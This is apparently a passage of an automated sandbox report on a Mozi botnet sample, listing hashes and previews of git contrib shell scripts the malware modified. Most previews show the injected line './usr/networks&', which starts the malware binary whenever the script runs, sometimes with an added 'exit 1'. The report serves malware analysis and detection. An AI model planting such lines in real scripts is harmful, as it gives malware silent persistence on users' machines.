                                                                                                                  SSDEEP:6:p5zAueMvudOATN8RXj040SryRqnsAHPiE/TA6K4n:paueMvSOsN8i4vORqsAHPn/TA6K4n
                                                                                                                  MD5:6B5C49DDB3925AD806E66DDA92D4E418
                                                                                                                  SHA1:39D261BAF8946100647BEA3B3A880E9F02D88856
                                                                                                                  SHA-256:7F280747A1078055FB5263854D39FDF589B66D9123F0BFBDCA8420E20E74CCEC
                                                                                                                  SHA-512:6C5FA59F21AA84EFB6EF5417CC19CC9B222857225E129D3CE5907A3B9FED2D389CB31FA40890BD08C5EF93A1044C2F0225639DC30BAC5A6921171FD30D3BD710
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.# We need to exit with 2 if the index does not match our HEAD tree,.# because the current index is what we will be committing as the.# merge result...git diff-index --quiet --cached HEAD -- || exit 2..exit 0../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-merge.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12742
                                                                                                                  Entropy (8bit):5.053935136942481
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RZqDktd3tRumXQN7vYT2kFjlW6vZXgq8FL6F2Wz17Le3YHNJ0ztQrp2LdHPbZ/Z+:RZmYd3tRumXQNzkFjlW6Vgq8FeFp17CK
                                                                                                                  MD5:2A8A8A129B42665461A116FCB6D89D8B
                                                                                                                  SHA1:A9CBE3681D2F91BBA4E8D498A0F7479FDA479B3A
                                                                                                                  SHA-256:F62B6129B085DEC827A5A45298E0DCFA9D3FACCBD77C487BBE085D32D3A5F6C1
                                                                                                                  SHA-512:A3B33D5810AF30524F6A7528C9D1B5EEA2D52C28C2B945795F887F131477124698C03173F373B2315BB8593597072A85E234D6E00EEDA5233B62A0C89ACAAE66
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&... "$GIT_DIR/MERGE_STASH" "$GIT_DIR/MERGE_MODE" || exit 1.}..savestate() {..# Stash away any local modifications...git stash create >"$GIT_DIR/MERGE_STASH".}..restorestate() {. if test -f "$GIT_DIR/MERGE_STASH"..then...git reset --hard $head >/dev/null...git stash apply $(cat "$GIT_DIR/MERGE_STASH")...git update-index --refresh >/dev/null..fi.}..finish_up_to_date () {..case "$squash" in..t)...echo "$1 (nothing to squash)" ;;..'')...echo "$1" ;;..esac..dropsave.}..squash_message () {..echo Squashed commit of the following:..echo..git log --no-merges --pretty=medium ^"$head" $remoteheads.}..finish () {..if test '' = "$2"..then...rlogm="$GIT_REFLOG_ACTION"..else...echo "$2"...rlogm="$GIT_REFLOG_ACTION: $2"..fi..case "$squash" in..t)...echo "Squash commit -- not updating HEAD"...squash_message >"$GIT_DIR/SQUASH_MSG"...;;..'')...case "$merge_msg" in...'')....echo "No merge message -- not updating HEAD"....;;...*)....git update-ref -m "$rlogm" HEAD "$1" "$head" || exit
                                                                                                                  /usr/share/doc/git/contrib/examples/git-notes.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-pull.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4349
                                                                                                                  Entropy (8bit):4.9994650554848405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:lB+CYcJmdl/TcE+v9+AggZXlRmfOQIJsbgSlz8LghIjMbefNB++c5xvANzm4GrH:XnYcQ9Anv0gXlRmy0leosTqxvANi4GrH
                                                                                                                  MD5:B39052D7DD650B5F80BCEF97A6F7058C
                                                                                                                  SHA1:EF47310F65C7239C67AFE91B0F76E78DC90D9AE8
                                                                                                                  SHA-256:46146F3FC719B41C9D31F192AA0611E3975884C720786394AD745B13227FCE74
                                                                                                                  SHA-512:46C39598206F81581740AB41E66B406FA7131511988713B38589069D1AB07F422189B1CA3999828E850ECAF345E93F6513947E44146334231E46DCCBF81D281F
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1..;;.esac..error_on_no_merge_candidates () {..exec >&2...if test true = "$rebase"..then...op_type=rebase...op_prep=against..else...op_type=merge...op_prep=with..fi...upstream=$(git config "branch.$curr_branch_short.merge")..remote=$(git config "branch.$curr_branch_short.remote")...if [ $# -gt 1 ]; then...if [ "$rebase" = true ]; then....printf "There is no candidate for rebasing against "...else....printf "There are no candidates for merging "...fi...echo "among the refs that you just fetched."...echo "Generally this means that you provided a wildcard refspec which had no"...echo "matches on the remote end."..elif [ $# -gt 0 ] && [ "$1" != "$remote" ]; then...echo "You asked to pull from the remote '$1', but did not specify"...echo "a branch. Because this is not the default configured remote"...echo "for your current branch, you must specify a branch on the command line."..elif [ -z "$curr_branch" -o -z "$upstream" ]; then.... git-parse-remote...error_on_missing_
                                                                                                                  /usr/share/doc/git/contrib/examples/git-repack.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2499
                                                                                                                  Entropy (8bit):5.168731776130111
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:gk8qWttthEvMBOv3h1Guyv97zFidlMli854KKOFjYIQM7C:gftttU0OP5Ezg4KO6IHu
                                                                                                                  MD5:6F9B4B96D854B71A3ABE079E040047D6
                                                                                                                  SHA1:C7AD001A3705F0E5004BA1B0F8DC4FFD995489D6
                                                                                                                  SHA-256:AC617B99EA453E02C13EEDFFC136E484E9AEE3ADAE6E4EE0D8BA6F2BB2E9E57A
                                                                                                                  SHA-512:5C229085CC34D3CFF2E0DDBE1C312DBDEE3D950D5B14E0B80408D849BE12DA39051E7136FC7D4C9F1E2135C0C4EB37CB2D507BC0DAB4FCB20FD6B0568C0CF15A
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                                  /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1947
                                                                                                                  Entropy (8bit):5.193786239756587
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                                  MD5:F1EDF5EE98492845561257661376A072
                                                                                                                  SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                                  SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                                  SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                                  /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2433
                                                                                                                  Entropy (8bit):5.07831529192731
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                                  MD5:71B42464943116BC0925788790C82720
                                                                                                                  SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                                  SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                                  SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                                  /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4385
                                                                                                                  Entropy (8bit):5.300590299626365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                                  MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                                  SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                                  SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                                  SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                                  /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1972
                                                                                                                  Entropy (8bit):5.222096129300364
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                                  MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                                  SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                                  SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                                  SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                                  /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):243
                                                                                                                  Entropy (8bit):5.091025781115778
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                                  MD5:BE780CC322587122E892D123BFF726B6
                                                                                                                  SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                                  SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                                  SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):792
                                                                                                                  Entropy (8bit):4.925184193549972
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                                  MD5:895868AC151D9953AD152F77240CF73D
                                                                                                                  SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                                  SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                                  SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):486
                                                                                                                  Entropy (8bit):5.198694046664742
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                                  MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                                  SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                                  SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                                  SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2904
                                                                                                                  Entropy (8bit):5.006955417229927
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                                  MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                                  SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                                  SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                                  SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                                  /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):637
                                                                                                                  Entropy (8bit):4.973192610623575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                                  MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                                  SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                                  SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                                  SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14967
                                                                                                                  Entropy (8bit):5.111069408805373
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                                  MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                                  SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                                  SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                                  SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                                  /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):822
                                                                                                                  Entropy (8bit):5.456000973546581
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                                  MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                                  SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                                  SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                                  SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                                  Malicious:false
